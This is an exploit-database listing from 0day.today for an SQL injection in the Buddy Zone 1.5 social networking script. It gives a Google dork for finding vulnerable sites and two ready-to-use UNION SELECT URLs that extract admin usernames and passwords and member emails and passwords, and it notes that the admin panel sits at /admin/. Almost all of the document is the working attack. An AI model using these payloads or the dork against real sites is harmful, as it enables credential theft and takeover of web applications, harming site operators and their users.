[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulnerability

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1988
Category
web applications
Date add
28-06-2007
Platform
unsorted
====================================================================
Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulnerability
====================================================================



--==+================================================================================+==--
--==+             Buddy Zone Version 1.5 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.vastal.com/buddy-zone-social-networking-script.html
DORK: allintext:"Powered By Buddy Zone"


DESCRIPTION: 
Remote sql injection in view_sub_cat.php cat_id, able to pull username/passwords of their admin and user accounts.


EXPLOITS:
http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,admin_user,0x3a,admin_password,0x3C62723E),4/**/FROM/**/admin_users/*
http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,member_email,0x3a,member_password,0x3C62723E),4/**/FROM/**/members/*


Tip/Note:
The Administrator's Panel is in /admin/.



#  0day.today [2024-10-05]  #